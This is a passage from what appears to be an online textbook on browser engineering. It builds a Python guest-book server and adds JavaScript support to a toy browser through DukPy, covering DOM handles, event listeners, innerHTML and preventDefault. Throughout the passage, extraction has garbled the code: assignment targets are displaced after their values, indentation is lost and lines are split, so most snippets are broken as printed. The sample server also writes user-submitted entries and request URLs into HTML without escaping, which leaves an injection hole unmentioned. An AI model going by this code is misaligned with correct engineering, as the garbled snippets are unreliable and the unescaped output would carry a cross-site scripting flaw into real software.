Ilya Grigorik’s High Performance Browser Networking is an excellent deep dive into networking and how to optimize for it in a web application. There are things the client can do (make fewer requests, avoid polling, reuse connections) and things the server can do (compression, protocol support, sharing domains).
So far all of this server code is “boilerplate”—any web application
will have similar code. What makes our server a guest book, on the other
hand, depends on what happens inside do_request
. It needs
to store the guest book state, generate HTML pages, and respond to
POST
requests.
Let’s store guest book entries in a Python list. Usually web applications use persistent state, like a database, so that the server can be restarted without losing state, but our guest book need not be that resilient.
= [ 'Pavel was here' ] ENTRIES
Next, do_request
has to output HTML that shows those
entries:
def do_request(method, url, headers, body):
= "<!doctype html>"
out for entry in ENTRIES:
+= "<p>" + entry + "</p>"
out return "200 OK", out
This is definitely “minimal” HTML, so it’s a good thing our browser
will insert implicit tags and has some default styles! You can test it
out by running this minimal web server and, while it’s running, direct
your browser to http://localhost:8000/
, where
localhost
is what your computer calls itself and
8000
is the port we chose earlier. You should see one guest
book entry.
It’s probably better to use a real web browser, instead of this book’s toy browser, to debug this web server. That way you don’t have to worry about browser bugs while you work on server bugs. But this server does support both real and toy browsers.
We’ll use forms to let visitors write in the guest book:
def do_request(method, url, headers, body):
# ...
+= "<form action=add method=post>"
out += "<p><input name=guest></p>"
out += "<p><button>Sign the book!</button></p>"
out += "</form>"
out # ...
When this form is submitted, the browser will send a
POST
request to http://localhost:8000/add
. So
the server needs to react to these submissions. That means
do_request
will field two kinds of requests: regular
browsing and form submissions. Let’s separate the two kinds of requests
into different functions.
First rename the current do_request
to
show_comments
:
def show_comments():
# ...
return out
This then frees up the do_request
function to figure out
which function to call for which request:
def do_request(method, url, headers, body):
if method == "GET" and url == "/":
return "200 OK", show_comments()
elif method == "POST" and url == "/add":
= form_decode(body)
params return "200 OK", add_entry(params)
else:
return "404 Not Found", not_found(url, method)
When a POST
request to /add
comes in, the
first step is to decode the request body:
def form_decode(body):
= {}
params for field in body.split("&"):
= field.split("=", 1)
name, value = urllib.parse.unquote_plus(name)
name = urllib.parse.unquote_plus(value)
value = value
params[name] return params
Note that I use unquote_plus
instead of
unquote
, because browsers may also use a plus sign to
encode a space. The add_entry
function then looks up the
guest
parameter and adds its content as a new guest book
entry:
def add_entry(params):
if 'guest' in params:
'guest'])
ENTRIES.append(params[return show_comments()
I’ve also added a “404” response. Fitting the austere stylings of our guest book, here’s the 404 page:
def not_found(url, method):
= "<!doctype html>"
out += "<h1>{} {} not found!</h1>".format(method, url)
out return out
Try it! You should be able to restart the server, open it in your browser, and update the guest book a few times. You should also be able to use the guest book from a real web browser.
Typically connection handling and request routing is handled by a web framework; this book, for example uses bottle.py. Frameworks parse requests into convenient data structures, route requests to the right handler, and can also provide tools like HTML templates, session handling, database access, input validation, and API generation.
With this chapter we’re starting to transform our browser into an application platform. We’ve added:
Plus, our browser now has a little web server friend. That’s going to be handy as we add more interactive features to the browser.
The complete set of functions, classes, and methods in our browser should now look something like this:
WIDTH
HEIGHT
HSTEP
VSTEP
SCROLL_STEP
FONTS
def get_font(size, weight, slant)
class Text:
def __init__(text, parent)
def __repr__()
class Element:
def __init__(tag, attributes, parent)
def __repr__()
def print_tree(node, indent)
class HTMLParser:
def __init__(body)
def parse()
def get_attributes(text)
def add_text(text)
SELF_CLOSING_TAGS
def add_tag(tag)
HEAD_TAGS
def implicit_tags(tag)
def finish()
BLOCK_ELEMENTS
class DrawRect:
def __init__(x1, y1, x2, y2, color)
def execute(scroll, canvas)
def __repr__()
class CSSParser:
def __init__(s)
def whitespace()
def literal(literal)
def word()
def pair()
def ignore_until(chars)
def body()
def selector()
def parse()
class TagSelector:
def __init__(tag)
def matches(node)
def __repr__()
class DescendantSelector:
def __init__(ancestor, descendant)
def matches(node)
def __repr__()
INHERITED_PROPERTIES
def style(node, rules)
def cascade_priority(rule)
class DrawText:
def __init__(x1, y1, text, font, color)
def execute(scroll, canvas)
def __repr__()
class URL:
def __init__(url)
def request(payload)
def resolve(url)
def tree_to_list(tree, list)
class DrawLine:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DrawOutline:
def __init__(x1, y1, x2, y2, color, thickness)
def execute(scroll, canvas)
def __repr__()
class DocumentLayout:
def __init__(node)
def layout()
def paint(display_list)
def __repr__()
class BlockLayout:
def __init__(node, parent, previous)
def token(tok)
def word(node, word)
def flush()
def recurse(node)
def open_tag(tag)
def close_tag(tag)
def layout()
def layout_mode()
def paint(display_list)
def get_font(node)
def __repr__()
def new_line()
def input(node)
class LineLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
class TextLayout:
def __init__(node, word, parent, previous)
def layout()
def paint(display_list)
CHROME_PX
class Tab:
def __init__()
def load(url, body)
def draw(canvas)
def scrolldown()
def click(x, y)
def go_back()
def __repr__()
def render()
def submit_form(elt)
def keypress(char)
class Browser:
def __init__()
def handle_down(e)
def handle_click(e)
def handle_key(e)
def handle_enter(e)
def load(url)
def paint_chrome()
def draw()
INPUT_WIDTH_PX
class InputLayout:
def __init__(node, parent, previous)
def layout()
def paint(display_list)
def __repr__()
if __name__ == "__main__"
There’s also a server now, but it’s much simpler:
def handle_connection(conx)
def do_request(method, url, headers, body)
def form_decode(body)
ENTRIES
def show_comments()
def not_found(url, method)
def add_entry(params)
if __name__ == "__main__"
If you run it, it should look something like this:
Enter key: In most browsers, if you hit the “Enter” or “Return” key while inside a text entry, that submits the form that the text entry was in. Add this feature to your browser.
GET forms: Forms can be submitted via GET requests as well
as POST requests. In GET requests, the form-encoded data is pasted onto
the end of the URL, separated from the path by a question mark, like
/search?q=hi
; GET form submissions have no body. Implement
GET form submissions.
Blurring: Right now, if you click inside a text entry, and
then inside the address bar, two cursors will appear on the screen. To
fix this, add a blur
method to each Tab
which
unfocuses anything that is focused, and call it before changing
focus.
Tab: In most browsers, the <Tab>
key (on
your keyboard) moves focus from one input field to the next. Implement
this behavior in your browser. The “tab order” of input elements should
be the same as the order of <input>
elements on the
page.The tabindex
property lets a web page change this tab order, but its behavior is
pretty weird.
Check boxes: In HTML, input
elements have a
type
attribute. When set to checkbox
, the
input
element looks like a checkbox; it’s checked if the
checked
attribute is set, and unchecked otherwise.Technically, the
checked
attribute only
affects the state of the checkbox when the page loads; checking and
unchecking a checkbox does not affect this attribute but instead
manipulates internal state. When the form is submitted, a
checkbox’s name=value
pair is included only if the checkbox
is checked. (If the checkbox has no value
attribute, the
default is the string on
.)
Resubmit requests: One reason to separate GET and POST requests is that GET requests are supposed to be idempotent (read-only, basically) while POST requests are assumed to change the web server state. That means that going “back” to a GET request (making the request again) is safe, while going “back” to a POST request is a bad idea. Change the browser history to record what method was used to access each URL, and the POST body if one was used. When you go back to a POST-ed URL, ask the user if they want to resubmit the form. Don’t go back if they say no; if they say yes, submit a POST request with the same body as before.
Message board: Right now our web server is a simple guest
book. Extend it into a simple message board by adding support for
topics. Each topic should have its own URL and its own list of messages.
So, for example, /cooking
should be a page of posts (about
cooking) and comments submitted through the form on that page should
only show up when you go to /cooking
, not when you go to
/cars
. Make the home page, from /
, list the
available topics with a link to each topic’s page. Make it possible for
users to add new topics.
Persistence: Back the server’s list of guest book entries with a file, so that when the server is restarted it doesn’t lose data.
Rich buttons: Make it possible for a button to contain arbitrary elements as children, and render them correctly. The children should be contained inside button instead of spilling out—this can make a button really tall. Think about edge cases, like a button that contains another button, an input area, or a link, and test real browsers to see what they do.
The first web applications were like last chapter’s guest book, with the server generating new web pages for every user action. But in the early 2000s, JavaScript-enhanced web applications, which can update pages dynamically and respond immediately to user actions, took their place. Let’s add support for this key web application technology to our toy browser.
Actually writing a JavaScript interpreter is beyond the scope of this
book,But check out a
book on programming language implementation if it sounds
interesting! so this chapter uses the dukpy
library for executing JavaScript.
DukPy wraps a JavaScript interpreter called Duktape. The most famous JavaScript interpreters are those used in browsers: TraceMonkey (Firefox), JavaScriptCore (Safari), and V8 (Chrome). Unlike those implementations, which are extremely fast but also extremely complex, Duktape aims to be simple and extensible, and is usually embedded inside a larger C or C++ project.For example, in a video game the high-speed graphics code is usually written in C or C++ , but the actual plot of the game is usually written in a simpler language.
Like other JavaScript engines, DukPy not only executes JavaScript code, but also allows JavaScript code to call exported Python functions. We’ll be using this feature to allow JavaScript code to modify the web page it’s running on.
The first step to using DukPy is installing it. On most machines, including on Windows, macOS, and Linux systems, you should be able to do this with:
pip3 install dukpy
Depending on your computer, the pip3
command might be
called pip
, or you might use easy_install
instead. You may also need to install pip3
. If you do your
Python programming through an IDE, you may need to use your IDE’s
package installer. If nothing else works, you can build from source.
If you’re following along in something other than Python, you might
need to skip this chapter, though you could try binding directly to the
duktape
library that dukpy
uses.
To test whether you installed DukPy correctly, execute this:
import dukpy
"2 + 2") dukpy.evaljs(
If you get an error on the first line, you probably failed to install DukPy.Or, on my Linux machine, I sometimes get errors due to file ownership. You may have to do some sleuthing. If you get an error, or a segfault, on the second line, there’s a chance that Duktape failed to compile, and maybe doesn’t support your system. In that case you might need to skip this chapter.
Note to JavaScript experts: Dukpy does not implement newer syntax
like let
and const
or arrow functions. You’ll
need to use old-school JavaScript from the turn of the century.
The test above shows how you run JavaScript code in DukPy: you just
call evaljs
! Let’s put this newfound knowledge to work in
our browser.
On the web, JavaScript is found in <script>
tags.
Normally, a <script>
tag has a src
attribute with a relative URL that points to a JavaScript file, much
like with CSS files. A <script>
tag could also
contain JavaScript source code between the start and end tag, but we
won’t implement that.It’s a challenge for parsing, since it’s hard to avoid less
than and greater than signs in JavaScript code.
Finding and downloading those scripts is similar to what we did for CSS. First, we need to find all of the scripts:
class Tab:
def load(self, url, body=None):
# ...
= [node.attributes["src"] for node
scripts in tree_to_list(nodes, [])
if isinstance(node, Element)
and node.tag == "script"
and "src" in node.attributes]
# ...
Next we run all of the scripts:
def load(self, url, body=None):
# ...
for script in scripts:
= url.resolve(script).request()
header, body print("Script returned: ", dukpy.evaljs(body))
# ...
This should run before styling and layout. To try it out, create a
simple web page with a script
tag:
<script src=test.js></script>
Then write a super simple script to test.js
, maybe
this:
var x = 2
+ x x
Point your browser at that page, and you should see:
Script returned: 4
That’s your browser running its first bit of JavaScript!
Actually, real browsers run JavaScript code as soon as the browser
parses the <script>
tag, not after the whole
page is parsed. Or, at least, that is the default; there are many
options. What our toy browser does is what a real browser does when
the defer
attribute is set. The default behavior is much
trickier to implement efficiently.
Right now our browser just prints the last expression in a script;
but in a real browser scripts must call the console.log
function to print. To support that, we will need to export a
function from Python into JavaScript. We’ll be exporting a lot of
functions, so to avoid polluting the Tab
object with many
new methods, let’s put this code in a new JSContext
class:
class JSContext:
def __init__(self):
self.interp = dukpy.JSInterpreter()
def run(self, code):
return self.interp.evaljs(code)
DukPy’s JSInterpreter
object stores the values of all
the JavaScript variables and lets us run multiple JavaScript snippets
and share variable values and other state between them.
We create this new JSContext
object while loading the
page:
class Tab:
def load(self, url, body=None):
# ...
self.js = JSContext()
for script in scripts:
# ...
self.js.run(body)
As a side benefit of using one JSContext
for all
scripts, it is now possible to run two scripts and have one of them
define a variable that the other uses, say on a page like this:
<script src=a.js></script>
<script src=b.js></script>
Suppose a.js
is “var x = 2;
” and
b.js
is “console.log(x + x)
”; the variable
x
is set in a.js
but used in
b.js
. In real web browsers, that’s important, since one
script might define library functions that another script wants to
call.
To provide JavaScript access to the outside world—such as to the
console output—we must export functions. The JavaScript function
console.log
corresponds to the Python print
function. We leverage this correspondence using DukPy’s
export_function
:If you’re using Python 2, you’ll need to write a little
wrapper function around print
instead.
class JSContext:
def __init__(self):
# ...
self.interp.export_function("log", print)
We can call an exported function from JavaScript using Dukpy’s
call_python
function. For example:
call_python("log", "Hi from JS")
When this JavaScript code runs, Dukpy converts the JavaScript string
"Hi from JS"
into a Python string,This conversion also works on
numbers, string, and booleans, but not with fancy objects.
and then passes that Python string to the print
function we
exported. Then print
prints that string.
Since we ultimately want JavaScript to call a
console.log
function, not a call_python
function, we need to define a console
object and then give
it a log
property. We can do that in
JavaScript:
console = { log: function(x) { call_python("log", x); } }
In case you’re not too familiar with JavaScript,Now’s a good time to brush
up—this chapter has a ton of JavaScript! this defines
a variable called console
, whose value is an object literal
with the property log
, whose value is a function that calls
call_python
.
We can call that JavaScript code our “JavaScript runtime”; we run it
before we run any user code, so let’s stick it in a
runtime.js
file and execute it when the
JSContext
is created, before we run any user code:
class JSContext:
def __init__(self):
# ...
with open("runtime.js") as f:
self.interp.evaljs(f.read())
Now you should be able to put console.log("Hi from JS!")
into a JavaScript file, run it from your browser, and see output in your
terminal. You should also be able to call console.log
multiple times.
Taking a step back, when we run JavaScript in our browser, we’re mixing: C code, which implements the JavaScript interpreter; Python code, which implements certain JavaScript functions; a JavaScript runtime, which wraps the Python API to look more like the JavaScript one; and of course some user code in JavaScript. There’s a lot of complexity here!
If a script runs for a long time, or has an infinite loop, our browser locks up and become completely unresponsive to the user. This is a consequence of JavaScript’s single-threaded semantics and its task-based, run-to-completion scheduling. Some APIs like Web Workers, allow limited multithreading, but those threads largely don’t have access to the DOM. Chapter 13 has more to say about how browsers deal with slow user scripts.
Crashes in JavaScript code are frustrating to debug. You can cause a crash by writing bad code, or by explicitly raising an exception, like so:
throw Error("bad");
When a web page runs some JavaScript that crashes, the browser should ignore the crash. Web pages shouldn’t be able to crash our browser! You can implement that like this:
class Tab:
def load(self, url, body=None):
for script in scripts:
# ...
try:
self.js.run(body)
except dukpy.JSRuntimeError as e:
print("Script", script, "crashed", e)
But as you go through this chapter, you’ll also run into another type of crash: crashes in the JavaScript runtime. We can’t ignore those, because we want our runtime to work. Debugging these crashes is a bear: by default DukPy won’t show a backtrace, and if the runtime code calls into a exported function that crashes it gets even more confusing.
Here’s a few tips to help with these crashes. First, if you get a crash inside some JavaScript function, wrap the body of the function like this:
function foo() {
try {
// ...
catch(e) {
} console.log("Crash in function foo()", e.stack);
throw e;
} }
This code catches all exceptions and prints a stack trace before re-raising them. If you instead are getting crashes inside an exported function you will need to wrap that function, on the Python side:
class JSContext:
def foo(self, arg):
try:
# ...
except:
import traceback
traceback.print_exc()raise
Debugging these issues is not easy, because all these calls between Python and JavaScript get pretty complicated. Because these bugs are hard, it’s worth approaching debugging systematically and gathering a lot of information before attempting a fix.
So far, JavaScript evaluation is fun but useless, because JavaScript can’t make any kinds of modifications to the page itself. (Why even run JavaScript if it can’t do anything besides print? Who looks at a browser’s console output?) We need to allow JavaScript to modify the page.
JavaScript manipulates a web page by calling any of a large set of methods collectively called the DOM API, for “Document Object Model”. The DOM API is big, and it keeps getting bigger, so we won’t be implementing all, or even most, of it. But a few core functions show key elements of the full API:
querySelectorAll
returns all the elements matching a
selector;getAttribute
returns an element’s value for some
attribute; andinnerHTML
replaces the contents of an element with new
HTML.We’ll implement simplified versions of these APIs.The simplifications will be
minor. querySelectorAll
will return an array, not this
thing called a NodeList
; innerHTML
will only
write the HTML contents of an element, and won’t allow reading those
contents. This suffices to demonstrate JavaScript-browser
interaction.
Let’s start with querySelectorAll
. First, export a
function:
class JSContext:
def __init__(self):
# ...
self.interp.export_function("querySelectorAll",
self.querySelectorAll)
# ...
In JavaScript, querySelectorAll
is a method on the
document
object, which we need to define in the JavaScript
runtime:
document = { querySelectorAll: function(s) {
return call_python("querySelectorAll", s);
}}
On the Python side, querySelectorAll
first has to parse
the selector and then find and return the matching elements. To parse
the selector, I’ll call into the CSSParser
’s
selector
method:If you pass querySelectorAll
an invalid
selector, the selector
call will throw an error, and DukPy
will convert that Python-side exception into a JavaScript-side exception
in the web script we are running, which can catch it and do something
else.
class JSContext:
def querySelectorAll(self, selector_text):
= CSSParser(selector_text).selector() selector
Next we need to find and return all matching elements. To do that, we
need the JSContext
to have access to the Tab
,
specifically to its nodes
field. So let’s pass in the
Tab
when creating a JSContext
:
class JSContext:
def __init__(self, tab):
self.tab = tab
# ...
class Tab:
def load(self, url, body=None):
# ...
self.js = JSContext(self)
# ...
Now querySelectorAll
will find all nodes matching the
selector:
def querySelectorAll(self, selector_text):
# ...
= [node for node
nodes in tree_to_list(self.tab.nodes, [])
if selector.matches(node)]
Finally we need to return those nodes back to JavaScript. You might try something like this:
def querySelectorAll(self, selector_text):
# ...
return nodes
However, this throws an error:Yes, that’s a confusing error message. Is it a
JSRuntimeError
, an EvalError
, or a
TypeError
? The confusion is a consequence of the complex
interaction of Python, JS, and C code.
_dukpy.JSRuntimeError: EvalError:
Error while calling Python Function:
TypeError('Object of type Element is not JSON serializable')
What DukPy is trying to tell you is that it has no idea what to do
with the Element
objects that querySelectorAll
returns. After all, the Element
class only exists in
Python, not JavaScript!
Python objects need to stay on the Python side of the browser, so JavaScript code will need to refer to them via some kind of indirection. I’ll use simple numeric identifier, which I’ll call a handle.Note the similarity to file descriptors, which give user-level applications access to kernel data structures.
We’ll need to keep track of the handle to node mapping. Let’s create
a node_to_handle
data structure to map nodes to handles,
and a handle_to_node
map that goes the other way:
class JSContext:
def __init__(self, tab):
# ...
self.node_to_handle = {}
self.handle_to_node = {}
# ...
Now the querySelectorAll
handler can allocate handles
for each node and return those handles instead:
def querySelectorAll(self, selector_text):
# ...
return [self.get_handle(node) for node in nodes]
The get_handle
function should create a new handle if
one doesn’t exist yet:
class JSContext:
def get_handle(self, elt):
if elt not in self.node_to_handle:
= len(self.node_to_handle)
handle self.node_to_handle[elt] = handle
self.handle_to_node[handle] = elt
else:
= self.node_to_handle[elt]
handle return handle
So now the querySelectorAll
handler returns something
like [1, 3, 4, 7]
, with each number being a handle for an
element, which DukPy can easily convert into JavaScript objects without
issue. Now of course, on the JavaScript side,
querySelectorAll
shouldn’t return a bunch of numbers: it
should return a list of Node
objects.In a real browser,
querySelectorAll
actually returns a NodeList
object, for kind-of abstruse reasons that aren’t relevant
here. So let’s define a Node
object in our
runtime that wraps a handle:If your JavaScript is rusty, you might want to read up on
the crazy way you define classes in JavaScript. Modern JavaScript also
provides the class
syntax, which is more sensible, but it’s
not supported in DukPy.
function Node(handle) { this.handle = handle; }
We create these Node
objects in
querySelectorAll
’s wrapper:This code creates new
Node
objects every time you call
querySelectorAll
, even if there’s already a
Node
for that handle. That means you can’t use equality to
compare Node
objects. I’ll ignore that but a real browser
wouldn’t.
document = { querySelectorAll: function(s) {
var handles = call_python("querySelectorAll", s);
return handles.map(function(h) { return new Node(h) });
}}
Now that we’ve got some Node
s, what can we do with
them?
One simple DOM method is getAttribute
, a method on
Node
objects that lets you get the value of HTML
attributes. Implementing getAttribute
means solving the
opposite problem to querySelectorAll
: taking
Node
objects on the JavaScript side, and shipping them over
to Python.
The solution is similar to querySelectorAll
: instead of
shipping the Node
object itself, we send over its
handle:
Node.prototype.getAttribute = function(attr) {
return call_python("getAttribute", this.handle, attr);
}
On the Python side, the getAttribute
function takes two
arguments, a handle and an attribute:
class JSContext:
def getAttribute(self, handle, attr):
= self.handle_to_node[handle]
elt return elt.attributes.get(attr, None)
Note that if the attribute is not assigned, the get
method will return None
, which DukPy will translate to
JavaScript’s null
. Don’t forget to export this function as
getAttribute
.
We finally have enough of the DOM API to implement a little character count function for text areas:
= document.querySelectorAll('input')
inputs for (var i = 0; i < inputs.length; i++) {
var name = inputs[i].getAttribute("name");
var value = inputs[i].getAttribute("value");
if (value.length > 100) {
console.log("Input " + name + " has too much text.")
} }
Ideally, though we’d update the character count every time the user types into an input box, but that requires running JavaScript on every key press. Let’s implement that next.
Node
objects in JavaScript correspond to
Element
nodes in the browser. They thus have JavaScript
object properties as well as HTML attributes. They’re
easy to confuse, and to make matters worse, many JavaScript object
properties reflect
attribute values automatically. For example, the id
property on Node
objects gives read-write access to the id
attribute of the underlying Element
. This is very
convenient, and avoids calling setAttribute
and
getAttribute
all over the place. But this reflection only
applies to certain fields; setting made-up JavaScript properties won’t
create corresponding HTML attributes, nor vice-versa.
The browser executes JavaScript code as soon as it loads the web page, that code often wants to change the page in response to user actions.
Here’s how that works. Any time the user interacts with the page, the
browser generates events. Each event has a type, like
change
, click
, or submit
, and
happens at a target element. The addEventListener
method allows JavaScript to react to those events:
node.addEventListener('click', func)
sets func
to run every time the element corresponding to node
generates a click
event. It’s basically Tk’s
bind
, but in the browser. Let’s implement it.
Let’s start with generating events. I’ll create a
dispatch_event
method and call it whenever an event is
generated. That includes, first of all, any time we click in the
page:
class Tab:
def click(self, x, y):
# ...
elif elt.tag == "a" and "href" in elt.attributes:
self.js.dispatch_event("click", elt)
# ...
elif elt.tag == "input":
self.js.dispatch_event("click", elt)
# ...
elif elt.tag == "button":
self.js.dispatch_event("click", elt)
# ...
# ...
Second, before updating input area values:
class Tab:
def keypress(self, char):
if self.focus:
self.js.dispatch_event("keydown", self.focus)
# ...
And finally, when submitting forms but before actually sending the request to the server:
def submit_form(self, elt):
self.js.dispatch_event("submit", elt)
# ...
So far so good—but what should the dispatch_event
method
do? Well, it needs to run listeners passed to
addEventListener
, so those need to be stored somewhere.
Since those listeners are JavaScript functions, we need to keep that
data on the JavaScript side, in a variable in the runtime. I’ll call
that variable LISTENERS
; we’ll use it to look up handles
and event types, so let’s make it map handles to a dictionary that maps
event types to a list of listeners:
= {}
LISTENERS
Node.prototype.addEventListener = function(type, listener) {
if (!LISTENERS[this.handle]) LISTENERS[this.handle] = {};
var dict = LISTENERS[this.handle];
if (!dict[type]) dict[type] = [];
var list = dict[type];
.push(listener);
list }
To dispatch an event, we need to look up the type and handle in the
LISTENERS
array, like this:
Node.prototype.dispatchEvent = function(type) {
var handle = this.handle;
var list = (LISTENERS[handle] && LISTENERS[handle][type]) || [];
for (var i = 0; i < list.length; i++) {
.call(this);
list[i]
} }
Note that dispatchEvent
uses the call
method on functions, which sets the value of this
inside
that function. As is standard in JavaScript, I’m setting it to the node
that the event was generated on.
When an event occurs, the browser calls dispatchEvent
from Python:
class JSContext:
def dispatch_event(self, type, elt):
= self.node_to_handle.get(elt, -1)
handle self.interp.evaljs(
type=type, handle=handle) EVENT_DISPATCH_CODE,
Here the EVENT_DISPATCH_CODE
constant is a string of
JavaScript code that dispatches a new event:
= \
EVENT_DISPATCH_CODE "new Node(dukpy.handle).dispatchEvent(dukpy.type)"
So when dispatch_event
is called on the Python side,
that runs dispatchEvent
on the JavaScript side, and that in
turn runs all of the event listeners. The dukpy
JavaScript
object in this code snippet stores the named type
and
handle
arguments to evaljs
.
With all this event-handling machinery in place, we can update the character count every time an input area changes:
function lengthCheck() {
var name = this.getAttribute("name");
var value = this.getAttribute("value");
if (value.length > 100) {
console.log("Input " + name + " has too much text.")
}
}
var inputs = document.querySelectorAll("input");
for (var i = 0; i < inputs.length; i++) {
.addEventListener("keydown", lengthCheck);
inputs[i] }
Note that lengthCheck
uses this
to
reference the input element that actually changed, as set up by
dispatchEvent
.
So far so good—but ideally the length check wouldn’t print to the console; it would add a warning to the web page itself. To do that, we’ll need to not only read from the page but also modify it.
So far we’ve implemented read-only DOM methods; now we need methods
that change the page. The full DOM API provides a lot of such methods,
but for simplicity I’m going to implement only innerHTML
,
which is used like this:
.innerHTML = "This is my <b>new</b> bit of content!"; node
In other words, innerHTML
is a property of node
objects, with a setter that is run when the field is modified.
That setter takes the new value, which must be a string, parses it as
HTML, and makes the new, parsed HTML nodes children of the original
node.
Let’s implement this, starting on the JavaScript side. JavaScript has
the obscure Object.defineProperty
function to define
setters, which DukPy supports:
Object.defineProperty(Node.prototype, 'innerHTML', {
set: function(s) {
call_python("innerHTML_set", this.handle, s.toString());
}; })
In innerHTML_set
, we’ll need to parse the HTML string.
That turns out to be trickier than you’d think, because our browser’s
HTML parser is intended to parse whole HTML documents, not these
document fragments. As an expedient, close-enough hack,Real browsers follow the standardized
parsing algorithm for HTML fragments. I’ll just wrap
the HTML in an html
and body
element:
def innerHTML_set(self, handle, s):
= HTMLParser("<html><body>" + s + "</body></html>").parse()
doc = doc.children[0].children new_nodes
Don’t forget to export the innerHTML_set
function. Note
that we extract all children of the body
element, because
an innerHTML_set
call can create multiple nodes at a time.
These new nodes must now be made children of the element
innerHTML_set
was called on:
def innerHTML_set(self, handle, s):
# ...
= self.handle_to_node[handle]
elt = new_nodes
elt.children for child in elt.children:
= elt child.parent
We update the parent pointers of those parsed child nodes because
otherwise they would point to the dummy body
element that
we added to aid parsing.
It might look like we’re done—but try this out and you’ll realize
that nothing happens when a script calls innerHTML_set
.
That’s because, while we have changed the HTML tree, we haven’t
regenerated the layout tree or the display list, so the browser is still
showing the old page.
Whenever the page changes, we need to update its rendering by calling
render
:Redoing layout for the whole page is often wasteful; Chapter 16 explores more complicated
algorithms to speed this up.
class JSContext:
def innerHTML_set(self, handle, s):
# ...
self.tab.render()
JavaScript can now modify the web page!Note that while rendering will update to account for the new HTML, any added scripts or style sheets will not properly load, and removed style sheets will (incorrectly) still apply. I’ve left fixing that to an exercise.
Let’s try this out this in our guest book. To prevent long rants in my guest book, I want a 100-character limit on guest book entries.
First, switch to the server codebase and add a
<label>
after the guest book form. Initially this
label will be empty, but we’ll write an error message into it if the
paragraph gets too long.
def show_comments():
# ...
+= "<label></label>"
out # ...
Also add a script to the page.
def show_comments():
# ...
+= "<script src=/comment.js></script>"
out # ...
Now the browser will request comment.js
, so our server
needs to serve that JavaScript file:
def do_request(method, url, headers, body):
# ...
elif method == "GET" and url == "/comment.js":
with open("comment.js") as f:
return "200 OK", f.read()
# ...
We can then put our little input length checker into
comment.js
, with the lengthCheck
function
modified to use innerHTML
:
var label = document.querySelectorAll("label")[0];
function lengthCheck() {
var value = this.getAttribute("value");
if (value.length > 100) {
.innerHTML = "Comment too long!";
label
}
}
var inputs = document.querySelectorAll("input");
for (var i = 0; i < inputs.length; i++) {
.addEventListener("keydown", lengthCheck);
inputs[i] }
Try it out: write a long comment and you should see the page warning
you that the comment is too long. By the way, we might want to make it
stand out more, so let’s go ahead and add another URL to our web server,
/comment.css
, with the contents:
font-weight: bold; color: red; } label {
Add a link
to the guest book page so that this style
sheet is loaded.
But even though we tell the user that their comment is too long the user can submit the guest book entry anyway. Oops! Let’s fix that.
This code has a subtle memory leak: if you access an HTML element
from JavaScript (thereby creating a handle for it) and then remove the
element from the page (using innerHTML
), Python won’t be
able to garbage-collect the Element
object because it is
still stored in the node_to_handle
map. And that’s good, if
JavaScript can still access that Element
via its handle,
but bad otherwise. Solving this is quite tricky, because it requires the
Python and JavaScript garbage collectors to cooperate.
So far, when an event is generated, the browser will run the listeners, and then also do whatever it normally does for that event—the default action. I’d now like JavaScript code to be able to cancel that default action.
There are a few steps involved. First of all, event listeners should
receive an event object as an argument. That object should have
a preventDefault
method. When that method is called, the
default action shouldn’t occur.
First of all, we’ll need event objects. Back to our JavaScript runtime:
function Event(type) {
this.type = type
this.do_default = true;
}
Event.prototype.preventDefault = function() {
this.do_default = false;
}
Note the do_default
field, to record whether
preventDefault
has been called. We’ll now be passing an
Event
object to dispatchEvent
, instead of just
the event type:
Node.prototype.dispatchEvent = function(evt) {
var type = evt.type;
// ...
for (var i = 0; i < list.length; i++) {
.call(this, evt);
list[i]
}// ...
return evt.do_default;
}
In Python, we now need to create an Event
to pass to
dispatchEvent
:
= \
EVENT_DISPATCH_CODE "new Node(dukpy.handle).dispatchEvent(new Event(dukpy.type))"
Also note that dispatchEvent
returns
evt.do_default
, which is not only standard in JavaScript
but also helpful when dispatching events from Python, because Python’s
dispatch_event
can return that boolean to its handler:
class JSContext:
def dispatch_event(self, type, elt):
# ...
= self.interp.evaljs(
do_default type=type, handle=handle)
EVENT_DISPATCH_CODE, return not do_default
This way, every time an event happens, the browser can check the
return value of dispatch_event
and stop if it is
True
. We have three such places in the click
method:
class Tab:
def click(self, x, y):
while elt:
# ...
elif elt.tag == "a" and "href" in elt.attributes:
if self.js.dispatch_event("click", elt): return
# ...
elif elt.tag == "input":
if self.js.dispatch_event("click", elt): return
# ...
elif elt.tag == "button":
if self.js.dispatch_event("click", elt): return
# ...
# ...
# ...
And one in submit_form
:
class Tab:
def submit_form(self, elt):
if self.js.dispatch_event("submit", elt): return
And one in keypress
:
class Tab:
def keypress(self, char):
if self.focus:
if self.js.dispatch_event("keydown", self.focus): return
Now our character count code can prevent the user from submitting a form: it can use a global variable to track whether or not submission is allowed, and then when submission is attempted it can check that variable and cancel that submission if necessary:
var allow_submit = true;
function lengthCheck() {
// ...
= value.length <= 100;
allow_submit if (!allow_submit) {
// ...
}
}
var form = document.querySelectorAll("form")[0];
.addEventListener("submit", function(e) {
formif (!allow_submit) e.preventDefault();
; })
This way it’s impossible to submit the form when the comment is too long!
Well… Impossible in this browser. But since there are browsers that don’t run JavaScript (like ours, one chapter back), we should check the length on the server side too:
def add_entry(params):
if 'guest' in params and len(params['guest']) <= 100:
'guest'])
ENTRIES.append(params[return show_comments()
Note that while our guest book is enhanced by JavaScript, it still uses HTML, CSS, form elements and all the other features we’ve built so far into our browser. This is in contrast to the recently-departed Adobe Flash, and before that Java Applets, which were self-contained plug-ins that handled input and rendering with their own technologies.
Because JavaScript builds on top of HTML and CSS, it allows web applications to go beyond what is built into the browser, similar in some ways to a browser extension. Ideally, web pages should be written so that they work correctly without JavaScript, but work better with it—this is the concept of progressive enhancement. In addition to supporting more browsers, progressive enhancement saves you from needing to re-invent HTML and CSS—even now that you now know how.
JavaScript first
appeared in 1995, as part of Netscape Navigator. Its name was chosen
to indicate a similarity to the Java
language, and the syntax is Java-esque for that reason. However, under
the surface JavaScript is a much more dynamic language than Java, as is
appropriate given its role as a progressive enhancement mechanism for
the web. For example, any method or property on any object (including
built-in ones like Element
) can be dynamically overridden
at any time. This makes it possible to polyfill
differences between browsers, adding features that look built-in to
other JavaScript code.
Our browser now runs JavaScript applications on behalf of websites. Granted, it supports just four methods from the vast DOM API, but even those demonstrate:
A web page can now add functionality via a clever script, instead of waiting for a browser developer to add it into the browser itself. And as a side-benefit, a web page can now earn the lofty title of “web application”.
The complete set of functions, classes, and methods in our browser should now look something like this:
